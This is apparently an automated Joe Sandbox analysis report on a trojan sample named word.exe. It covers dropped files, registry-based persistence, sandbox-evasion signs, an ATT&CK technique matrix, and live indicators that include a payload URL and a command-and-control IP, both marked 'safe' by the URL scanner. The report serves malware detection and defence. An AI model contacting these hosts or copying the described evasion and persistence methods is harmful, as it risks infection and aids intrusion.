              Source: Yara matchFile source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, type: DROPPED
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: System.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1014f
              Source: word.exeStatic PE information: real checksum: 0xb3966 should be: 0xb47c4
              Source: Julenissen.exe.21.drStatic PE information: real checksum: 0xb3966 should be: 0xb47c4
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_10002D30 push eax; ret 0_2_10002D5E
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015275A pushad ; retf 37DBh21_2_0015277D
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exeJump to dropped file
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dllJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\word.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows RunJump to behavior
              Source: C:\Users\user\Desktop\word.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS\PerformanceJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\word.exeAPI/Special instruction interceptor: Address: 7302C33
              Source: C:\Users\user\Desktop\word.exeAPI/Special instruction interceptor: Address: 58D2C33
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 37E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: 39E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\word.exeAPI coverage: 0.2 %
              Source: C:\Users\user\Desktop\word.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\word.exe TID: 7396Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00402645 FindFirstFileA,21_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00405FF5 FindFirstFileA,FindClose,21_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,21_2_004055B1
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\word.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q!Hyper-V Hypervisor Root Partition
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q*Hyper-V Dynamic Memory Integration Service
              Source: word.exe, 00000015.00000003.1818293472.000000003C7C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
              Source: word.exe, 00000015.00000003.1819484760.000000003C793000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000003.1822603900.000000003C793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitiona
              Source: word.exe, 00000015.00000003.1822177141.000000003C91C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %u<WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Process
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q$Hyper-V Hypervisor Logical Processor
              Source: word.exe, 00000015.00000003.1821690930.000000003C7F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q!Hyper-V Virtual Machine Bus Pipes
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)Hyper-V Hypervisor Root Virtual Processor
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: word.exe, 00000015.00000003.1826101326.000000003A0B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Servicelm
              Source: word.exe, 00000015.00000003.1824336160.000000003A0C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes'
              Source: C:\Users\user\Desktop\word.exeAPI call chain: ExitProcess graph end nodegraph_0-4259
              Source: C:\Users\user\Desktop\word.exeAPI call chain: ExitProcess graph end nodegraph_0-4423
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00401F68 LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryExA,GetProcAddress,FreeLibrary,0_2_00401F68
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: C:\Users\user\Desktop\word.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\word.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"Jump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Users\user\Desktop\word.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405D13 GetVersion,LdrInitializeThunk,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D13
              Source: C:\Users\user\Desktop\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              Windows Service
              1
              Windows Service
              11
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              11
              Process Injection
              1
              Disable or Modify Tools
              LSASS Memory31
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Clipboard Data
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Registry Run Keys / Startup Folder
              31
              Virtualization/Sandbox Evasion
              Security Account Manager3
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              11
              Process Injection
              NTDS114
              System Information Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              word.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl00%Avira URL Cloudsafe
              http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl00%Avira URL Cloudsafe
              https://www.ssl.com/repository00%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
              https://filedn.com/lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin0%Avira URL Cloudsafe
              http://crls.ssl.com/ssl.com-rsa-RootCA.crl00%Avira URL Cloudsafe
              http://ocsps.ssl.com0?0%Avira URL Cloudsafe
              http://certificate.crt/localhosthttp://localhost/70%Avira URL Cloudsafe
              https://186.2.171.76/agent.ashx$0%Avira URL Cloudsafe
              http://certificate.crt/0%Avira URL Cloudsafe
              http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt00%Avira URL Cloudsafe
              http://ocsps.ssl.com00%Avira URL Cloudsafe
              http://certificate.crt/localhostsihttp://localhost/o0%Avira URL Cloudsafe
              http://ocsps.ssl.com0_0%Avira URL Cloudsafe
              https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
              http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q0%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
              http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer00%Avira URL Cloudsafe
              http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl00%Avira URL Cloudsafe
              http://www.quovadis.bm00%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt00%Avira URL Cloudsafe
              https://186.2.171.76/agent.ashx0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              filedn.com
              74.120.9.25
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://filedn.com/lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.binfalse
                • Avira URL Cloud: safe
                unknown
                https://186.2.171.76/agent.ashxfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://certificate.crt/word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crls.ssl.com/ssl.com-rsa-RootCA.crl0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_Errorword.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://186.2.171.76/agent.ashx$word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://certificate.crt/localhosthttp://localhost/7word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.ssl.com/repository0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsps.ssl.com0?word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsps.ssl.com0_word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qword.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://ocsps.ssl.com0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.quovadis.bm0word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://certificate.crt/localhostsihttp://localhost/oword.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorword.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://ocsp.quovadisoffshore.com0word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameword.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                186.2.171.76
                unknownBelize
                262254DDOS-GUARDCORPBZfalse
                74.120.9.25
                filedn.comUnited States
                7366LEMURIACOUSfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1497467
                Start date and time:2024-08-22 16:05:29 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 19m 25s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                Run name:Suspected Instruction Hammering
                Number of analysed new started processes analysed:30
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:word.exe
                Detection:MAL
                Classification:mal54.troj.evad.winEXE@3/10@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 93%
                • Number of executed functions: 55
                • Number of non-executed functions: 75
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SppExtComObj.Exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, UsoClient.exe, BackgroundTransferHost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, slui.exe, WmiApSrv.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
